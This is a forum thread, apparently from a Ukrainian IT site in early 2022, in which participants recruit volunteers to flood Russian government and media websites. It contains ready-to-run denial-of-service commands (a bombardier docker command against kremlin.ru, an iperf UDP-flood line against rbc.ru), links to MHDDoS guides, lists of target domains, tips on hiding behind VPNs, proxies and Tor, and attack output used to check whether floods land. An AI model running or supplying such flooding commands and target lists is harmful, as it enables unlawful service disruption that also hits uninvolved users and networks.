народ присоединяемся к тому чтобы пропаганда не пролезла
Коллеги нас много — давайте беспокоить окупантов в IT пространстве.
Запустите кто может маленькую штучку против пропаганды
Заходите на
gitlab.almerico.org/resist/bombardier
тут документация и скрипты для запуска в AWS , GCP, Azure,
или хоть так
под впн на рашу
docker run -ti --rm alpine/bombardier -c 1000 -d 600s -l http://kremlin.ru
sites here
cyber-war-bombardier.herokuapp.com
If status is Still kicking this is our client.
Also list of our clients
76 коментарів
Додати коментар Підписатись на коментаріВідписатись від коментаріва хтось знає як bombardier на Ubuntu запустити через docker run з vpn?
поставив собі NordVpn в контейнер, але з «—network container:vpn» — чомусь не працює
коли з таким flag запускаю bombardier — просто іде загрузка, та в кінці не фінішує, треба контейнер стопати руками
як достукатись до youtube щоб прикрили нахер канали як оцей:
www.youtube.com/.../UCAyoyj6QDZR4HU_kOLrPSsg
UP, ребят а 1000 запросов не мало, если хочу использовать на всю виртуалки, сколько можно выставить для пиковых нагрузок?
подобавляли доки
привіт, а ти не знаєш як bombardier на Ubuntu запустити через docker run з vpn?
поставив собі NordVpn в контейнер, але з «—network container:vpn» — чомусь не працює
коли з таким flag запускаю bombardier — просто іде загрузка, та в кінці не фінішує, треба контейнер стопати руками
github.com/...xuj/RusskijKorablIdiNaxuj
-
як POST запит зробити з тою штукою? він не кешується
тут не тире а два дефиса должно быть если что. Но это уже вопрос к админам почему так конвертит при отправке/отображении сообщения
Ні, це питання до топікстартера, який не вміє користуватися теґами. Поза кодом заміна
Проте перелік замалий і фіксований, ліпше долучатися до атак, організовуваних IT-армією, инакше це розпилювання ресурсів.--і---на типографічні тире цілком виправдана, не всюди їх зручно набирати.feedputin.chickenkiller.com/urls.json
cyber-war-bombardier.herokuapp.com
Кому нудно просто тримати фонову вкладку: feedputin.chickenkiller.com
Бажано заходити через проксі/VPN, в ідеалі російські.
оно ничого не відправляє
Команда YouTube повідомила AIN, що з 26 лютого призупиняє можливість монетизації низки російських каналів на YouTube, зокрема каналів RT на YouTube у всьому світі, і вживає низку інших заходів.
ain.ua/...-rosijskoyu-propagandoyu
Sergiy Kanyshchev
www.facebook.com/kanishchev
пише:
Кіберполіція розробила Telegram чат-бот для блокування сервісів дезінформації
nv.ua/...in-pracyuye-50220378.html
МВС України пише:
Кіберполіцейські спільно з волонтерами блокували сайти окупанта
Наразі недоступними залишаються онлайн-ресурси уряду РФ, найбільших ЗМІ, а також банків.
t.me/mvs_ukraine/8871
telegra.ph/...dopomogoyu-serverіv-02-26
Написав інструкцію з оренди хостинга та запуску в докері баомбардира, росповсюджуйте!
привіт, а ти не знаєш як bombardier на Ubuntu запустити через docker run з vpn?
поставив собі NordVpn в контейнер, але з «—network container:vpn» — чомусь не працює
коли з таким flag запускаю bombardier — просто іде загрузка, та в кінці не фінішує, треба контейнер стопати руками
куку, переписав гайд, юзай чистий пітон без докера, думаю впн запрацює добре, але там юзається MHDDos він на сокет 5 рівня (хттп і т.д.) може проксю заюзати вбудовану telegra.ph/...dopomogoyu-serverіv-02-26
О дякую, зараз так спробую
а Tor буде норм працювати з MHDDos ?
чи вбудованої проксі буде достатньо?
і не треба буде вмикати впн та Тор?
і ще питання — як дізнатися що ддос успішно працює?
бомбардір пише кількість відопідей в розрізі по статусам (200х — n, 400х — n, 500х — n)
а тут як?
дякую!
якщо щось дойшло то ок, якщо все по нулям то забанили
а як дізнатися що щось дійшло?
HTTP codes:
1xx — 0, 2xx — 0, 3xx — 0, 4xx — 0, 5xx — 0
others — 1000
Errors:
dial tcp 95.173.136.70:80: connect: connection refused — 1000
так погано а так
Reqs/sec 114.75 388.14 1845.58
Latency 544.27ms 325.62ms 0.90s
Latency Distribution
50% 227.74ms
75% 0.87s
90% 0.89s
95% 0.89s
99% 0.89s
HTTP codes:
1xx — 0, 2xx — 200, 3xx — 0, 4xx — 0, 5xx — 0
others — 0
Throughput: 2.18MB/s
Очень хорошо 2xx — 200
если
то побанили
так це ви пишите про бомбардір) це я бачив
а як в MHDDos?
статистика не виводиться?
В России перестали работать сайты Кремля, правительства и Госдумы
www.rbc.ru/.../621a414a9a79472a02b93cdd
рбк должен вместе с ними лежать
Вже лежить :)
up
Роскомнадзор потребовал от 10 СМИ удалить «недостоверную информацию» о войне с Украиной. Он запретил называть войну войной
meduza.io/...etil-nazyvat-voynu-voynoy
ВОЙНА — ЭТО МИР
СВОБОДА — ЭТО РАБСТВО
НЕЗНАНИЕ — СИЛА
«Это не начало войны, это во-первых.
Это очень важно.
Наше стремление предотвратить развитие событий, которые могли бы перерасти в глобальную войну.
И во-вторых, это окончание войны»
Официальный представитель МИД РФ Мария Захарова
24 февраля
Хлопці, допиляйте, щоб можна було валити тільки російські сайти. Бо це готова тулзня щоб валити все що забажаєш. І відкриті коди по можливості сховайте, щоб перевірку прибрати було складніше.
Як подивитися логи по доставленим пакетам та кількості помилок?
В цій темі більш активне обговорення і список сайтів розширеніший
dou.ua/forums/topic/36671
Oleksandr Merkulov я б ще порадив не використовувати флаг -l — він відповідає за показ статистики, на генерацію якої витрачаються ресурси локальної машини.
pkg.go.dev/...om/codesenberg/bombardier
Народ, а як можна приготувати udp-flood «тест» під лінухом без танців з бубном і з консолі?
Знайшов. Ось тут опис як то все тестувати
chanind.github.io/...stress-testing-iperf.html
Ну і замість цього $hostname ставите інший, наприклад www.rbc.ru
iperf -c $hostname -u -t 300 -b 10MЯкщо комусь треба тільки бінарник — то він тут
github.com/codesenberg/bombardier
в секції релізи
github.com/...nberg/bombardier/releases
Российским государственным СМИ запретили показывать рекламу и осуществлять монетизацию в Facebook, заявил глава отделения по политике безопасности компании Натаниэль Глейхер.
up
Ще ворожі сайти:
mil.ru
scrf.gov.ru
ach.gov.ru
epp.genproc.gov.ru
Счетная палата ... то, что оно упало они не заметят ещё года2-3 %)
up
‘If Kyiv Falls, We Keep Hacking Putin’: On The Cyber Front Line In Ukraine
www.forbes.com/...ber-frontline-in-ukraine
как понять что оно работает?что в консоли должно быть?
docker ps — покажет запущенные контейнеры
там куча столбиков с цифрами, надеюсь это оно
Скрин в студию (но в целом так и должно быть — сколькт запустил — столько покажет)
ru.files.fm/u/7hdqujugg
В мене два запитання: друге менш важливе, а от перше таке: що за всратий ворожий домен ти вибрав і чому? Відповідь на солов’їний якщо змога.
сорі, перший який знайшов в гуглі, можу перезалити
Та ні, все ок, бачу що наче не ворог. (Ну або дуже винахідливий та освідченний)
В тебе Windows, а я на цій ОСі не розуміюсь, тре тобі погуглити як перелік запущених контейнерів там правильно визвати, та спробувати різні варіанти.
Але якщо після запуску контейнерів з’являвся сгенерованний хєш то все має бути ок
дякую!перезалив скрини, наче працює
telegra.ph/evervreer-02-25
docker ps
ru.files.fm/f/5cra99g8n
-
-
Хлопці а є готовий контейнер для запуску на докер хабі?
hub.docker.com/r/alpine/bombardier
-
up
Хороша штука, потестую.
Нет смысла, пока вы забиваете канал своим ддосом кто-то сидит без инета. Ддос так не делают
up 12×4.2Ghz 1000mbps
Done. Up
up
up
up
up